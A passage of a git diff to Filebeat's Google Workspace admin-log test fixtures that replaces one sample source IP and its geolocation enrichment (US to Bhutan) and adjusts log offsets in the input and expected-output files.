+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"USE_GOOGLE_MOBILE_MANAGEMENT_FOR_IOS\"}}",
 "event.provider": "admin",
 "event.type": [
 "info"
@@ -1508,26 +1400,22 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 12782,
+ "log.offset": 12755,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1548,7 +1436,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_ACCOUNT_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -1563,27 +1451,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13120,
+ "log.offset": 13092,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1607,7 +1491,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -1622,27 +1506,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 13577,
+ "log.offset": 13548,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
@@ -1666,7 +1546,7 @@
 "event.dataset": "google_workspace.admin",
 "event.id": "1",
 "event.module": "google_workspace",
- "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_CANCEL_WIPE_THEN_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "event.provider": "admin",
 "event.type": [
 "change",
@@ -1681,27 +1561,23 @@
 "google_workspace.kind": "admin#reports#activity",
 "google_workspace.organization.domain": "elastic.com",
 "input.type": "log",
- "log.offset": 14053,
+ "log.offset": 14023,
 "organization.id": "1",
 "related.ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ],
 "related.user": [
 "foo",
 "user"
 ],
 "service.type": "google_workspace",
- "source.as.number": 7922,
- "source.as.organization.name": "Comcast Cable Communications, LLC",
- "source.geo.city_name": "State College",
- "source.geo.continent_name": "North America",
- "source.geo.country_iso_code": "US",
- "source.geo.country_name": "United States",
- "source.geo.location.lat": 40.7957,
- "source.geo.location.lon": -77.8618,
- "source.geo.region_iso_code": "US-PA",
- "source.geo.region_name": "Pennsylvania",
- "source.ip": "98.235.162.24",
+ "source.as.number": 35908,
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "BT",
+ "source.geo.country_name": "Bhutan",
+ "source.geo.location.lat": 27.5,
+ "source.geo.location.lon": 90.5,
+ "source.ip": "67.43.156.13",
 "source.user.domain": "bar.com",
 "source.user.email": "foo@bar.com",
 "source.user.id": "1",
diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log
index 3ad1efedd6aa..0a2ae8ad7922 100644
--- a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log
+++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log
@@ -1,17 +1,17 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ENABLED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ENABLED","value":"DISABLED"},{"name":"ORG_UNIT_NAME","value":"org"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_DELETED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_APPLICATION_LICENSE_RESERVATION_UPDATED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SKU_NAME","value":"sku"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"ASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"UNASSIGN_CUSTOM_LOGO","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_ENROLLMENT_TOKEN","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CHROME_LICENSES_ALLOWED","parameters":[{"name":"APPLICATION_NAME","value":"app"},{"name":"CHROME_LICENSES_ALLOWED","value":"EMPTY"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"CREATE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REMOVE_ORG_UNIT","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_DESCRIPTION","parameters":[{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"MOVE_ORG_UNIT","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"EDIT_ORG_UNIT_NAME","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"REVOKE_DEVICE_ENROLLMENT_TOKEN","parameters":[{"name":"FULL_ORG_UNIT_PATH","value":"full/org/path"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"ORG_SETTINGS","name":"TOGGLE_SERVICE_ENABLED","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SERVICE_NAME","value":"new"}]}} diff --git a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json index efb0d4fefd70..4af8c73d15c7 100644 --- a/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json +++ b/x-pack/filebeat/module/google_workspace/admin/test/admin-org-test.json.log-expected.json 
@@ -8,7 +8,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_LICENSES_ENABLED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CHROME_LICENSES_ENABLED\",\"value\":\"DISABLED\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "event.provider": "admin", "event.type": [ "change" 
@@ -25,23 +25,19 @@ "log.offset": 0, "organization.id": "1", "related.ip": [ - "98.235.162.24" + "67.43.156.13" ], "related.user": [ "foo" ], "service.type": "google_workspace", - "source.as.number": 7922, - "source.as.organization.name": "Comcast Cable Communications, LLC", - "source.geo.city_name": "State College", - "source.geo.continent_name": "North America", - "source.geo.country_iso_code": "US", - "source.geo.country_name": "United States", - "source.geo.location.lat": 40.7957, - "source.geo.location.lon": -77.8618, - "source.geo.region_iso_code": "US-PA", - "source.geo.region_name": "Pennsylvania", - "source.ip": "98.235.162.24", + "source.as.number": 35908, + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "BT", + "source.geo.country_name": "Bhutan", + "source.geo.location.lat": 27.5, + "source.geo.location.lon": 90.5, + "source.ip": "67.43.156.13", "source.user.domain": "bar.com", "source.user.email": "foo@bar.com", "source.user.id": "1", 
@@ -62,7 +58,7 @@ "event.dataset": "google_workspace.admin", "event.id": "1", "event.module": "google_workspace", - "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"ORG_SETTINGS\",\"name\":\"CHROME_APPLICATION_LICENSE_RESERVATION_CREATED\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SKU_NAME\",\"value\":\"sku\"}]}}", + "event.original": 